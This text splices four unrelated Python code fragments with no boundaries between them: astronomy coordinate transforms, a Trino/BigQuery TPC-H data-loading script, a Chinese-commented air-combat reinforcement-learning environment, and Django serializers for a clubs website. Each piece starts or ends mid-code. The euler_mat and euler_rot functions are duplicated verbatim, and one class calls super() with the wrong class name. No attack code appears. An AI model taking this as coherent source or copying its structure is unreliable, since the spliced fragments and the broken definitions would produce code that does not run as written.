cel2hor(coord, time, site, copy=True): from enlib.coordinates import pyfsla from enlib.coordinates import iers # This is very slow for objects near the horizon! coord = np.array(coord, copy=copy) trepr = time[len(time)/2] info = iers.lookup(trepr) ao = pyfsla.sla_aoppa(trepr, info.dUT, site.lon*utils.degree, site.lat*utils.degree, site.alt, info.pmx*utils.arcsec, info.pmy*utils.arcsec, site.T, site.P, site.hum, 299792.458/site.freq, site.lapse) am = pyfsla.sla_mappa(2000.0, trepr) # This involves a transpose operation, which is not optimal pyfsla.oamulti(time, coord.T, ao, am) return coord def tele2hor(coord, site, copy=True): coord = np.array(coord, copy=copy) coord = euler_rot([site.base_az*utils.degree, site.base_tilt*utils.degree, -site.base_az*utils.degree], coord) return coord def hor2tele(coord, site, copy=True): coord = np.array(coord, copy=copy) coord = euler_rot([site.base_az*utils.degree, -site.base_tilt*utils.degree, -site.base_az*utils.degree], coord) return coord def tele2bore(coord, bore, copy=True): """Transforms coordinates [{ra,dec},...] to boresight-relative coordinates given by the boresight pointing [{ra,dec},...] with the same shape as coords. After the rotation, the boresight will be at the zenith; things above the boresight will be at 'ra'=180 and things below will be 'ra'=0.""" coord = np.array(coord, copy=copy) return recenter(coord, bore) def bore2tele(coord, bore, copy=True): """Transforms coordinates [{ra,dec},...] from boresight-relative coordinates given by the boresight pointing [{ra,dec},...] with the same shape as coords. After the rotation, the coordinates will be in telescope coordinates, which are similar to horizontal coordinates.""" coord = np.array(coord, copy=copy) return decenter(coord, bore) def euler_mat(euler_angles, kind="zyz"): """Defines the rotation matrix M for a ABC euler rotation, such that M = A(alpha)B(beta)C(gamma), where euler_angles = [alpha,beta,gamma]. The default kind is ABC=ZYZ.""" alpha, beta, gamma = euler_angles R1 = utils.rotmatrix(gamma, kind[2]) R2 = utils.rotmatrix(beta, kind[1]) R3 = utils.rotmatrix(alpha, kind[0]) return np.einsum("...ij,...jk->...ik",np.einsum("...ij,...jk->...ik",R3,R2),R1) def euler_rot(euler_angles, coords, kind="zyz"): coords = np.asarray(coords) co = coords.reshape(2,-1) M = euler_mat(euler_angles, kind) rect = utils.ang2rect(co, False) rect = np.einsum("...ij,j...->i...",M,rect) co = utils.rect2ang(rect, False) return co.reshape(coords.shape) def euler_mat(euler_angles, kind="zyz"): """Defines the rotation matrix M for a ABC euler rotation, such that M = A(alpha)B(beta)C(gamma), where euler_angles = [alpha,beta,gamma]. The default kind is ABC=ZYZ.""" alpha, beta, gamma = euler_angles R1 = utils.rotmatrix(gamma, kind[2]) R2 = utils.rotmatrix(beta, kind[1]) R3 = utils.rotmatrix(alpha, kind[0]) return np.einsum("...ij,...jk->...ik",np.einsum("...ij,...jk->...ik",R3,R2),R1) def euler_rot(euler_angles, coords, kind="zyz"): coords = np.asarray(coords) co = coords.reshape(2,-1) M = euler_mat(euler_angles, kind) rect = utils.ang2rect(co, False) rect = np.einsum("...ij,j...->i...",M,rect) co = utils.rect2ang(rect, False) return co.reshape(coords.shape) def recenter(angs, center, restore=False): """Recenter coordinates "angs" (as ra,dec) on the location given by "center", such that center
replicas announce("Waiting for deployments to be available") spinWait(lambda: waitUntilDeploymentsAvail(4, namespace)) # now the load balancers need to be running with their IPs assigned announce("Waiting for load-balancers to launch") spinWait(lambda: waitUntilLoadBalancersUp(services, namespace)) # # Get the DNS name of the load balancers we've created # lbs = getLoadBalancers(services, namespace) # we should have a load balancer for every service we'll forward assert len(lbs) == len(services) for svc in services: assert svc in lbs tuns.append(Tunnel(svc, ipaddress.IPv4Address(bastionIp), getLclPort(svc), lbs[svc], getRmtPort(svc))) # make sure the load balancers are actually responding announce("Waiting for load-balancers to start responding") spinWait(lambda: waitUntilLoadBalancersUp(services, namespace, checkConnectivity = True)) # TODO AWS Doesn't support specification of a static IP for the ELB, so we # cannot set up Route53 in Terraform to point to a static IP. Instead we # need to use the aws cli to hand-modify the Route53 entries to create # aliases to our load-balancer DNS names. if target == "aws": assert route53ZoneId setRoute53Cname(lbs, route53ZoneId) return tuns class ApiError(Exception): pass def retryHttp(f, maxretries: int, descr: str) -> requests.Response: retries = 0 stime = 1 while True: try: r = f() if r.status_code == 503: time.sleep(0.5) continue # All good -- we exit here. if retries > 0: print(f"Succeeded on \"{descr}\" after {retries} retries") return r except requests.exceptions.ConnectionError as e: print(f"Failed to connect: \"{descr}\"; retries={retries}; " f"sleep={stime}") if retries > maxretries: print(f"{maxretries} retries exceeded!") raise time.sleep(stime) retries += 1 stime <<= 1 def sendSql(command: str, verbose = False) -> list: httpmaxretries = 10 if verbose: announceSqlStart(command) url = getStarburstUrl() + "/v1/statement" hdr = { "X-Trino-User": trinouser } authtype = None if tlsenabled(): authtype = requests.auth.HTTPBasicAuth(trinouser, trinopass) f = lambda: requests.post(url, headers = hdr, auth = authtype, data = command, verify = secrets["wildcert"]["f"] if tlsinternal else None) r = retryHttp(f, maxretries = httpmaxretries, descr = f"POST [{command}]") data = [] while True: r.raise_for_status() assert r.status_code == 200 j = r.json() if "data" in j: data += j["data"] if "nextUri" not in j: if "error" in j: raise ApiError("Error executing SQL '{s}': error {e}".format(s = command, e = str(j["error"]))) if verbose: announceSqlEnd(command) return data # the only way out is success, or an exception if tlsinternal: f = lambda: requests.get(j["nextUri"], headers = hdr, verify = secrets["wildcert"]["f"]) else: f = lambda: requests.get(j["nextUri"], headers = hdr, verify = None) r = retryHttp(f, maxretries = httpmaxretries, descr = f"GET nextUri [{command}]") def dontLoadCat(cat: str) -> bool: avoidcat = {tpchcat, syscat, sfdccat} # Synapse serverless pools are read-only if target == "az": avoidcat.add(synapseslcat) return cat in avoidcat or cat.startswith("sg_") def getTpchTableSize(scale: str, table: str) -> int: global tpchtables assert table in tpchtables assert scale in tpchbuckets b = tpchbuckets[scale]["tsizes"] assert table in b return b[table] class CommandGroup: def __init__(self): self.cv = threading.Condition() self.workToDo = 0 self.workDone = 0 # Methods modifying state protected by cv (condition variable) lock # Must be called with lock held--and this is only called by wait_for on the # condition variable, which always guarantees the lock is held def allCommandsDone(self) -> bool: assert self.workDone <= self.workToDo return self.workDone == self.workToDo def ratioDone(self) -> float: with self.cv: assert self.workDone <= self.workToDo, \ f"{self.workDone} should be <= {self.workToDo}" # It's possible that no commands were processed, in which case # avoid doing a division-by-zero by saying we're finished. ratio = float(self.workDone) / self.workToDo \ if self.workToDo > 0 else 1.0 return ratio def checkCopiedTable(self, dstCatalog: str, dstSchema: str, dstTable: str, rows: int) -> None: dest = "{dc}.{ds}.{dt}".format(dc = dstCatalog, ds = dstSchema, dt = dstTable) try: copiedRows = sendSql(f"select count(*) from {dest}")[0][0] if copiedRows < rows: print(f"Tried to process {rows}, only did {copiedRows}") except ApiError as e: print(f"Couldn't read rows from {dest}") def processSqlCommand(self, cmd: str, callback = None) -> None: x = sendSql(cmd) if callback: callback(x) with self.cv: self.workDone += 1 self.cv.notify_all() def addSqlCommand(self, cmd, callback = None) -> None: t = threading.Thread(target = self.processSqlCommand, args = (cmd, callback, )) with self.cv: self.workToDo += 1 t.start() def processSqlTableCommand(self, srcTable: str, dstCatalog: str, dstSchema: str, rows: int, cmd: str = None, check: bool = False) -> None: if cmd: sendSql(cmd) if check: self.checkCopiedTable(dstCatalog, dstSchema, srcTable, rows) # We get here whether it works or not with self.cv: self.workDone += rows self.cv.notify_all() def addSqlTableCommand(self, tpchSchema: str, srcTable: str, dstCatalog: str, dstSchema: str, cmd: str = None, check: bool = False) -> None: rows = getTpchTableSize(tpchSchema, srcTable) t = threading.Thread(target = self.processSqlTableCommand, args = (srcTable, dstCatalog, dstSchema, rows, cmd, check, )) with self.cv: self.workToDo += rows t.start() def processBqCommand(self, srcCatalog: str, srcSchema: str, srcTable: str, dstSchema: str, rows: int, check: bool = False) -> None: assert srcCatalog == hivecat # Get the list of files to be loaded storage_client = storage.Client() blobs = storage_client.list_blobs(bucket, prefix=f"{srcCatalog}/{srcSchema}/{srcTable}/") paths = [f"gs://{bucket}/{b.name}" for b in blobs if b.name[-1] != '/'] assert len(paths) > 0 # Construct a BigQuery client object. client = bigquery.Client() # TODO this could break if someone changes to Parquet format job_config = bigquery.LoadJobConfig(write_disposition = bigquery.WriteDisposition.WRITE_EMPTY, source_format = bigquery.SourceFormat.ORC,) table_id = "{dp}.{ds}.{st}".format(dp = gcpproject, ds = dstSchema, st = srcTable) try: load_job = client.load_table_from_uri(paths, table_id, job_config=job_config) # Make an API request. load_job.result() # Waits for the job to complete. except google.api_core.exceptions.Conflict as e: # This exception indicates that there was already a table. That's # fine and we can completely ignore that message. pass # This check should pass even if we got a write conflict destination_table = client.get_table(table_id) assert destination_table.num_rows == rows if check: self.checkCopiedTable(bqcat, dstSchema, srcTable, rows) # We get here whether it works or not with self.cv: self.workDone += rows self.cv.notify_all() def addBqCommand(self, tpchSchema: str, srcCatalog: str, srcSchema: str, srcTable: str, dstSchema: str, check: bool = False) -> None: rows = getTpchTableSize(tpchSchema, srcTable) t = threading.Thread(target = self.processBqCommand, args = (srcCatalog, srcSchema, srcTable, dstSchema, rows, check,)) with self.cv: self.workToDo += rows t.start() def waitOnAllCopies(self) -> None: with self.cv: self.cv.wait_for(self.allCommandsDone) def preloadTpchTableSizes(scaleSets: set[str]) -> None: # First, get the list of table names # global tpchtables, tpchbuckets assert len(scaleSets) > 0 scale = next(iter(scaleSets)) if not tpchtables: tabs = sendSql(f"show tables in {tpchcat}.{scale}") tpchtables = {t[0] for t in tabs} announce("Getting tpch table sizes for scale sets -> " "{}".format(", ".join(scaleSets))) # Next, fill in the sizes of each of the tables for each scale # cg = CommandGroup() for scale in scaleSets: assert scale in tpchbuckets b = tpchbuckets[scale]["tsizes"] lock = threading.Lock() for table in tpchtables: if table not in b: # callback will make a closure with b[table], storing the # results there that come back from the SQL call. We have to # use an odd construction here because Python performs # late-binding with closures; to force early binding we'll use # a function-factory. https://tinyurl.com/4x3t2wux def make_cbs(b, scale, table): def cbs(tablesize): with lock: b[table] = tablesize[0][0] return cbs cg.addSqlCommand("select count(*) from " f"{tpchcat}.{scale}.{table}", callback = make_cbs(b, scale, table)) spinWait(cg.ratioDone) cg.waitOnAllCopies() # Should be a no-op def createSchemas(dstCatalogs: list, dstSchema: str, hiveTarget: str) -> None: cg = CommandGroup() announce("creating schemas in {}".format(", ".join(dstCatalogs))) for dstCatalog in dstCatalogs: clause = "" if dstCatalog in lakecats: clause = " with (location = '{l}/{c}/{s}')".format(l = hiveTarget, c = dstCatalog, s = dstSchema) cg.addSqlCommand("create schema if not exists " f"{dstCatalog}.{dstSchema}{clause}") # Progress meter on all transfers across all destination schemas spinWait(cg.ratioDone) cg.waitOnAllCopies() # Should be a no-op def copySchemaTables(srcCatalog: str, srcSchema: str, dstCatalogs: list[str], hiveTarget: str, partition: bool, numbuckets: int): # Never write to the source, or to unwritable catalogs dstCatalogs = [c for c in dstCatalogs if not dontLoadCat(c) or c == srcCatalog] # If there are no catalogs to process, then just return if len(dstCatalogs) < 1: return # First, create all the schemas that we need createSchemas(dstCatalogs, dbschema, hiveTarget) tpchschema = srcSchema if srcCatalog != hivecat else tpchbigschema cg = CommandGroup() announce("creating tables in {}".format(", ".join(dstCatalogs))) for dstCatalog in dstCatalogs: # Now copy the data over from our
#!usr/bin/env python3 # -*- coding: utf-8 -*- import numpy as np import math import time import sys sys.path.append('../..') from envs.airCombateEnv.customization import init_posture from envs.airCombateEnv.customization import REGISTRY_STATE as registry_state from argument.argManage import args from envs.unit import REGISTRY as registry_unit if sys.version_info.major == 2: import Tkinter as tk else: import tkinter as tk np.set_printoptions(suppress=True) class Env(object): def __init__(self): ''' 基类构造函数: 还至少需要设置 state_space, action_space, state_dim, action_dim 包含 单位实例列表 red_unit_list, blue_unit_list ''' # 地图设置 self.AREA = args.map_area # 地图范围 # 可视化显示参数 self.SCALE = args.map_scale # 比例尺 self.SCOPE = self.AREA * self.SCALE # Tkinter显示范围 # 训练参数 self.t = args.map_t # 时间间隔(步长,秒) self.td = self.t / args.map_t_n # 每个步长计算次数 self.Sum_Oil = 100 # 油量,即每个episode的最大step数量 ## 飞机列表 self.red_unit_list = [] self.blue_unit_list = [] def _seed(self, seed): ''' 设置随机种子 ''' np.random.seed(seed) def reset(self): ''' 环境初始化 输出: 当前状态(所有飞机的当前状态) ''' raise NotImplementedError def step(self, *action): ''' 输入: 动作(环境内所有飞机的动作) 输出: <下一状态,奖励值,done>,当前状态可以省略 待扩展: 局部可观察obs,额外状态信息(全局状态)state ''' raise NotImplementedError def _get_reward(self, *args): ''' 根据当前飞机信息,给出奖励函数。 最好是输入设置为当前环境能够给出的所有信息,返回的是奖励值。 这样当使用时可以不用管中间的逻辑实现,只需看输入、输出; 当想创建新的奖励函数模型时,只需要根据环境所能提供的信息,来实现此函数内逻辑的实现。 ''' raise NotImplementedError def render(self): ''' 环境的可视化显示 ''' raise NotImplementedError def close(self): ''' 可视化关闭 ''' raise NotImplementedError # Partially Observable Env for Multi-Agent # 部分可观察的多智能体环境使用 def get_state(self): raise NotImplementedError def get_state_shape(self): raise NotImplementedError def get_agent_obs(self, agent_id): raise NotImplementedError def get_agent_obs_shape(self): raise NotImplementedError def _get_avail_actions(self): raise NotImplementedError def _get_agent_avail_actions(self, agent_id): raise NotImplementedError class AirCombatEnv(Env): def __init__(self): super(AirCombatEnv, self).__init__() # 飞机参数 self.red = registry_unit["default"](None, 200, 80) # 红方飞机 self.blue = registry_unit["default"](None, 200, 80) # 蓝方飞机 # reward判断指标 self.AA_range = 60 # 视界角范围 self.ATA_range = 30 # 天线拂擦角范围 self.Dis_max = 500 # 距离最大值 self.Dis_min = 100 # 距离最小值 self.adv_count = 0 # 持续建立优势的次数 # 初始想定模式:0随机,1进攻,2防御,3同向,4中立 self.init_scen = args.init_scen # 强化学习动作接口 self.action_space = ['l', 's', 'r'] # 向左滚转、维持滚转、向右滚转 self.n_actions = len(self.action_space) self.action_dim = self.n_actions self.state_dim = len(registry_state[args.state_setting](self.red, self.blue, self.adv_count)) # reward条件 self.success = 0 def reset_selfPlay(self): # 初始化参数 self.reward_b = 0 self.reward_r = 0 self.done = False self.success = 0 self.acts = [[], []] self.advs = [] self.ATA_b = self.AA_b = 100 self.ATA_r = self.AA_r = 100 self.adv_count = 0 # 初始化红蓝方飞机 init_posture(self.init_scen, self.red, self.blue, args.random_r, args.random_b) self.red.oil = args.Sum_Oil self.blue.oil = args.Sum_Oil # print(self.red.ac_pos) # print(self.blue.ac_pos) # 计算ATA,AA self.ATA_b, self.AA_b = self._getAngle(self.red.ac_pos, self.blue.ac_pos, self.red.ac_heading, self.blue.ac_heading) self.ATA_r, self.AA_r = self._getAngle(self.blue.ac_pos, self.red.ac_pos, self.blue.ac_heading, self.red.ac_heading) # 计算距离 dis = self._get_dis(self.red.ac_pos, self.blue.ac_pos) # 计算优势 self.adv_count = self._calculate_Advantages(self.adv_count, dis, self.AA_r, self.ATA_r, self.AA_b, self.ATA_b) # reward shaping RA_b = 1 - ((1 - math.fabs(self.ATA_b) / 180) + (1 - math.fabs(self.AA_b) / 180)) RA_r = 1 - ((1 - math.fabs(self.ATA_r) / 180) + (1 - math.fabs(self.AA_r) / 180)) RD = math.exp(-(math.fabs(dis - ((self.Dis_max + self.Dis_min) / 2)) / 180 * 0.1)) Rbl_b = RA_b * RD Rbl_r = RA_r * RD self.fai_b = -0.01 * Rbl_b self.fai_r = -0.01 * Rbl_r # 返回红蓝飞机状态 s_b = registry_state[args.state_setting](self.red, self.blue, self.adv_count) s_r = registry_state[args.state_setting](self.blue, self.red, self.adv_count) return s_b, s_r def step_selfPlay(self, action_b, action_r): # 记录动作 self.acts[0].append(action_b) self.acts[1].append(action_r) # 执行动作 self.blue.move(action_b) self.red.move(action_r) # print(self.red.ac_pos) # print(self.blue.ac_pos) # 返回红蓝飞机状态 s_b = registry_state[args.state_setting](self.red, self.blue, self.adv_count) s_r = registry_state[args.state_setting](self.blue, self.red, self.adv_count) # 计算reward self.reward_b, self.reward_r, self.done, self.adv_count = self._get_reward(self.red.ac_pos, self.red.ac_heading, self.blue.ac_pos, self.blue.ac_heading, self.adv_count) # print(s_b, s_r, self.reward_b, self.reward_r, self.done) return s_b, s_r, self.reward_b, self.reward_r, self.done def _getAngle(self, agent_A_pos, agent_B_pos, agent_A_heading, agent_B_heading): """ param: agent_A_pos: 飞机A的坐标 agent_B_pos: 飞机B的坐标 agent_A_heading: 飞机A的朝向角 agent_B_heading: 飞机B的朝向角 return: B的AA和ATA角 主要逻辑: 分别输入两架飞机的位置坐标 和 朝向角, 计算 第二架飞机B的 ATA 和 AA 角(见doc/pic/envs_airCombateEnv_001.png) """ theta_br = 180 * math.atan2((agent_A_pos[1] - agent_B_pos[1]), (agent_A_pos[0] - agent_B_pos[0])) / math.pi theta_rb = 180 * math.atan2((agent_B_pos[1] - agent_A_pos[1]), (agent_B_pos[0] - agent_A_pos[0])) / math.pi if theta_br < 0: theta_br = 360 + theta_br if theta_rb < 0: theta_rb = 360 + theta_rb ATA = agent_B_heading - theta_br AA = 180 + agent_A_heading - theta_rb if ATA > 180: ATA = 360 - ATA elif ATA < -180: ATA = 360 + ATA if AA > 180: AA = 360 - AA elif AA < -180: AA = 360 + AA return ATA, AA def _get_reward(self, ac_pos_r, ac_heading_r, ac_pos_b, ac_heading_b, adv_count): dis = math.sqrt((ac_pos_r[0] - ac_pos_b[0]) * (ac_pos_r[0] - ac_pos_b[0]) + (ac_pos_r[1] - ac_pos_b[1]) * (ac_pos_r[1] - ac_pos_b[1])) # 计算ATA和AA self.ATA_b, self.AA_b = self._getAngle(ac_pos_r, ac_pos_b, ac_heading_r, ac_heading_b) self.ATA_r, self.AA_r = self._getAngle(ac_pos_b, ac_pos_r, ac_heading_b, ac_heading_r) # 计算优势 adv_count = self._calculate_Advantages(adv_count, dis, self.AA_r, self.ATA_r, self.AA_b, self.ATA_b) # reward shaping RA_b = 1 - ((1 - math.fabs(self.ATA_b) / 180) + (1 - math.fabs(self.AA_b) / 180)) RA_r = 1 - ((1 - math.fabs(self.ATA_r) / 180) + (1 - math.fabs(self.AA_r) / 180)) RD = math.exp(-(math.fabs(dis - ((self.Dis_max + self.Dis_min) / 2)) / 180 * 0.1)) Rbl_b = RA_b * RD Rbl_r = RA_r * RD self.old_fai_b = self.fai_b self.old_fai_r = self.fai_r self.fai_b = -0.01 * Rbl_b self.fai_r = -0.01 * Rbl_r # 计算reward和终止条件 # print(adv_count) if adv_count >= 9: done = True self.success = 1 reward_b = 2.0 reward_r = -2.0 # print("bsuccess") elif adv_count <= -9: done = True self.success = -1 reward_b = -2.0 reward_r = 2.0 # print("rsuccess") elif self.red.oil <= 0 and self.blue.oil <= 0: done = True self.success = 0 reward_b = -1.0 reward_r = -1.0 elif (ac_pos_b[0] > args.map_area) or ((0 - ac_pos_b[0]) > args.map_area) or \ (ac_pos_b[1] > args.map_area) or ((0 - ac_pos_b[1]) > args.map_area): done = True self.success = 0 reward_b = -1.0 reward_r = (self.fai_r - self.old_fai_r) - 0.001 elif (ac_pos_r[0] > args.map_area) or ((0 - ac_pos_r[0]) > args.map_area) or \ (ac_pos_r[1] > args.map_area) or ((0 - ac_pos_r[1]) > args.map_area): done = True self.success = 0 reward_b = (self.fai_b - self.old_fai_b) - 0.001 reward_r = -1.0 else: done = False reward_b = (self.fai_b - self.old_fai_b) - 0.001 reward_r = (self.fai_r - self.old_fai_r) - 0.001 return reward_b, reward_r, done, adv_count def _calculate_Advantages(self, adv_count, dis, AA_r, ATA_r, AA_b, ATA_b): """ 计算红蓝方优势次数 :param adv_count:优势次数:-1为红方优势态势,1为蓝方优势态势 :param dis:距离 :param AA_r:红方AA角 :param ATA_r:红方ATA角 :param AA_b:蓝方AA角 :param ATA_b:蓝方ATA角 :return:优势次数 """ # 计算优势 if (dis < self.Dis_max) and (dis > self.Dis_min) \ and (abs(AA_b) < self.AA_range) and (abs(ATA_b) < self.ATA_range): if adv_count >= 0: # 如果之前蓝方已经是优势态势,优势累加 adv_count += 1 else: # 如果之前是红方优势态势,优势交替 adv_count = 1 elif (dis < self.Dis_max) and (dis > self.Dis_min) \ and (abs(AA_r) < self.AA_range) and (abs(ATA_r) < self.ATA_range): if adv_count <= 0: adv_count -= 1 else: adv_count = -1 else: adv_count = 0 self.advs.append(adv_count) return adv_count def _get_dis(self, pos_a, pos_b): """ 计算坐标A和坐标B的距离 :param pos_a: 坐标A :param pos_b: 坐标B :return: 坐标A和坐标B的距离 """ dis = math.sqrt((pos_a[0] - pos_b[0]) * (pos_a[0] - pos_b[0]) + (pos_a[1] - pos_b[1]) * (pos_a[1] - pos_b[1])) return dis def creat_ALG(self): self.Tk = tk.Tk() self.Tk.title('1V1') self.Tk.canvas = tk.Canvas(self.Tk, bg='white', height=args.map_area * args.map_scale * 2, width=args.map_area * args.map_scale * 2) self.Tk.canvas.pack() def render(self): # 刷新红方飞机 self.r_show = self.xyz2abc(self.red.ac_pos) self.r = self.Tk.canvas.create_oval( self.r_show[0] - 1, self.r_show[1] - 1, self.r_show[0] + 1, self.r_show[1] + 1, fill='red') # 刷新蓝方飞机 self.b_show = self.xyz2abc(self.blue.ac_pos) self.b = self.Tk.canvas.create_oval( self.b_show[0] - 1, self.b_show[1] - 1, self.b_show[0] + 1, self.b_show[1] + 1, fill='blue') self.Tk.update() time.sleep(0.05) if self.done: time.sleep(0.1) self.Tk.destroy() def close(self): self.Tk.destroy() def xyz2abc(self, pos): pos_show = np.array([0, 0]) pos_show[0] = pos[0] * args.map_scale + args.map_area * args.map_scale pos_show[1] = args.map_area * args.map_scale - pos[1] * args.map_scale return pos_show class AirCombatEnvMultiUnit(Env): def __init__(self): super(AirCombatEnv, self).__init__() # 初始化双方飞机 id_number = 0 for name in args.red_unit_type_list: # args.red_unit_type_list为飞机类型名字列表 red_unit = registry_unit[name](id_number) self.red_unit_list.append(red_unit) id_number = id_number + 1 id_number = 0 for name in args.blue_unit_type_list: blue_unit = registry_unit[name](id_number) self.blue_unit_list.append(blue_unit) id_number = id_number + 1 self.n_red_unit = len(args.red_unit_type_list) self.n_blue_unit = len(args.blue_unit_type_list) # 强化学习动作接口 # 【方案一】 直接使用联结动作空间,即 [a1, a2, ..., an, a1, a2, ..., an, ...] # 注意:如果红蓝双方飞机数量不一致,则分别定义 self.single_action_space = ['l', 's', 'r'] # 向左滚转、维持滚转、向右滚转 self.action_space = self.single_action_space * self.n_red_unit # # 【方案二】 使用decentralized policy,即动作空间只包含单独一个agent的 # self.action_space = ['l', 's', 'r'] self.action_dim = self.n_actions = len(self.action_space) self.state_dim = 5 # 需要定义 # todo:reward判断指标 def reset_selfPlay(self): self.done = False self.success = 0 self.acts = [[], []] # todo-levin: 只保存一个agent的acts,还是两个acgent的acts? # 1°初始化红蓝红方飞机 # todo: # 【方案一】: # 按照实际阵型构建初始化阵型函数,初始化中心飞机的位置,确定每个飞机的位置 # 【方案二】: # 随机初始化一个区域,在区域内随机初始各飞机的位置 # 遍历列表初始化飞机的状态:滚转角、油量等 # 2°得到初始状态 for unit in self.red_unit_list: # 分别得到红、蓝双方的联结状态空间 pass for unit in self.blue_unit_list: pass # levin - [done]: add both actions def step_selfPlay(self, action_blue_list, action_red_list): ''' Parms: action_b: list or tuple action_r: list or tuple ''' #
event that includes basic associated club information. """ club = serializers.SlugRelatedField( queryset=Club.objects.all(), required=False, slug_field="code" ) club_name = serializers.SerializerMethodField() badges = BadgeSerializer(source="club.badges", many=True, read_only=True) pinned = serializers.BooleanField(read_only=True) def get_club_name(self, obj): if obj.club is None: return None return obj.club.name class Meta: model = Event fields = ClubEventSerializer.Meta.fields + [ "club", "club_name", "badges", "pinned", ] class EventWriteSerializer(EventSerializer): """ A serializer for an event that is used when creating/editing the event. Enables URL checking for the url field. """ url = serializers.CharField( max_length=2048, required=False, allow_blank=True, allow_null=True ) def update(self, instance, validated_data): """ Enforce only changing the meeting link to Zoom links for activities fair events. """ if instance.type == Event.FAIR and "url" in validated_data: old_url = instance.url or "" new_url = validated_data.get("url", "") # if the two urls are not equal, perform additional checks if old_url != new_url: parsed_url = urlparse(new_url) if ".zoom.us" not in parsed_url.netloc and new_url: raise serializers.ValidationError( { "url": "You should use a Zoom link for the meeting url! " "You can use the Zoom setup page to do this for you." } ) return super().update(instance, validated_data) class FavouriteEventSerializer(EventSerializer): pass class ClubBoothSerializer(serializers.ModelSerializer): club = serializers.SlugRelatedField(queryset=Club.objects.all(), slug_field="code") class Meta: model = ClubFairBooth fields = ( "name", "subtitle", "club", "image_url", "lat", "long", "start_time", "end_time", ) class MembershipInviteSerializer(serializers.ModelSerializer): id = serializers.CharField(max_length=8, read_only=True) email = serializers.EmailField(read_only=True) token = serializers.CharField(max_length=128, write_only=True) name = serializers.CharField(source="club.name", read_only=True) public = serializers.BooleanField(write_only=True, required=False) def create(self, validated_data): validated_data.pop("public", None) return super().create(validated_data) def update(self, instance, validated_data): user = self.context["request"].user public = validated_data.pop("public", False) if not self.validated_data.get("token") == self.instance.token: raise serializers.ValidationError("Missing or invalid token in request!") # if there is an owner and the invite is for a upenn email, # do strict username checking if ( self.instance.email.endswith((".upenn.edu", "@upenn.edu")) and self.instance.club.membership_set.count() > 0 ): # penn medicine emails have multiple aliases if not self.instance.email.endswith("@pennmedicine.upenn.edu"): invite_username = self.instance.email.rsplit("@", 1)[0] if not ( invite_username.lower() == user.username.lower() or self.instance.email == user.email ): raise serializers.ValidationError( f"This invitation was meant for {invite_username}, " f"but you are logged in as {user.username}!" ) # claim the invite and set the membership public status obj = instance.claim(user) obj.public = public obj.save() # if a membership request exists, delete it MembershipRequest.objects.filter(person=user, club=self.instance.club).delete() return instance class Meta: model = MembershipInvite fields = [ "email", "id", "name", "public", "role", "title", "token", "updated_at", ] class ExternalMemberListSerializer(serializers.ModelSerializer): """ This serializer is used for listing non-sensitive data accessible to the public via CORS """ name = serializers.CharField(source="person.username") image = serializers.SerializerMethodField("get_image") def get_image(self, obj): if not obj.image and not obj.person.profile.image: return None return obj.image.url if obj.image else obj.person.profile.image.url class Meta: model = Membership fields = ["name", "role", "description", "image"] class UserMembershipInviteSerializer(MembershipInviteSerializer): """ This serializer is used for listing the email invitations that the current user was sent. """ token = serializers.CharField(max_length=128) code = serializers.CharField(source="club.code", read_only=True) class Meta(MembershipInviteSerializer.Meta): fields = MembershipInviteSerializer.Meta.fields + ["code"] class MembershipSerializer(ClubRouteMixin, serializers.ModelSerializer): """ Used for listing which users are in a club for members who are not in the club. """ email = serializers.SerializerMethodField("get_email") username = serializers.SerializerMethodField("get_username") name = serializers.SerializerMethodField("get_full_name") person = serializers.PrimaryKeyRelatedField( queryset=get_user_model().objects.all(), write_only=True ) role = serializers.IntegerField(write_only=True, required=False) image = serializers.SerializerMethodField("get_image") def get_username(self, obj): if not obj.public: return None return obj.person.username def get_full_name(self, obj): if not obj.public: return "Anonymous" return obj.person.get_full_name() def get_email(self, obj): if not obj.public or not obj.person.profile.show_profile: return None return obj.person.email def get_image(self, obj): if not obj.public: return None if not obj.image and not obj.person.profile.image: return None image_url = obj.image.url if obj.image else obj.person.profile.image.url if image_url.startswith("http"): return image_url elif "request" in self.context: return self.context["request"].build_absolute_uri(image_url) else: return image_url def validate_role(self, value): """ Ensure that users cannot promote themselves to a higher role. Also ensure that owners can't demote themselves without leaving another owner. """ user = self.context["request"].user mem_user_id = ( self.instance.person.id if self.instance else self.initial_data["person"] ) club_code = self.context["view"].kwargs.get( "club_code", self.context["view"].kwargs.get("code") ) membership = Membership.objects.filter( person=user, club__code=club_code ).first() if user.has_perm("clubs.manage_club"): return value if membership is None: raise serializers.ValidationError( "You must be a member of this club to modify roles!" ) if membership.role > value: raise serializers.ValidationError( "You cannot promote someone above your own level." ) if value > Membership.ROLE_OWNER and user.id == mem_user_id: if membership.role <= Membership.ROLE_OWNER: if ( Membership.objects.filter( club__code=club_code, role__lte=Membership.ROLE_OWNER ).count() <= 1 ): raise serializers.ValidationError( "You cannot demote yourself if you are the only owner!" ) return value def validate(self, data): """ Normal members can only change a small subset of information. """ user = self.context["request"].user club_code = self.context["view"].kwargs.get( "club_code", self.context["view"].kwargs.get("code") ) membership = Membership.objects.filter( person=user, club__code=club_code ).first() if not user.is_superuser and ( membership is None or membership.role > Membership.ROLE_OFFICER ): for field in data: if field not in {"active", "public"}: raise serializers.ValidationError( 'Normal members are not allowed to change "{}"!'.format(field) ) return data class Meta: model = Membership fields = [ "active", "email", "image", "name", "person", "public", "role", "title", "username", "description", ] class AuthenticatedMembershipSerializer(MembershipSerializer): """ Provides additional information about members, such as email address. Should only be available to users in the club. """ role = serializers.IntegerField(required=False) email = serializers.EmailField(source="person.email", read_only=True) username = serializers.CharField(source="person.username", read_only=True) def get_full_name(self, obj): return obj.person.get_full_name() class Meta(MembershipSerializer.Meta): pass class ClubMinimalSerializer(serializers.ModelSerializer): """ Return only the club name, code, and approval status for a club. """ class Meta: model = Club fields = ["name", "code", "approved"] class ClubConstitutionSerializer(ClubMinimalSerializer): """ Return the minimal information, as well as the files that the club has uploaded. """ files = serializers.SerializerMethodField("get_constitution") def get_constitution(self, obj): user = self.context["request"].user perm = user.is_authenticated and user.has_perm("clubs.see_pending_clubs") if hasattr(obj, "user_membership_set"): has_member = bool(obj.user_membership_set) else: has_member = False if hasattr(obj, "prefetch_asset_set"): return [ { "name": asset.name if perm or has_member else None, "url": asset.file.url if perm or has_member else None, } for asset in obj.prefetch_asset_set if asset.name.endswith((".docx", ".doc", ".pdf")) or "constitution" in asset.name.lower() ] return None class Meta(ClubMinimalSerializer.Meta): fields = ClubMinimalSerializer.Meta.fields + ["files"] class ClubListSerializer(serializers.ModelSerializer): """ The club list serializer returns a subset of the information that the full serializer returns. Optimized for the home page, some fields may be missing if not necessary. For example, if the subtitle is set, the description is returned as null. This is done for 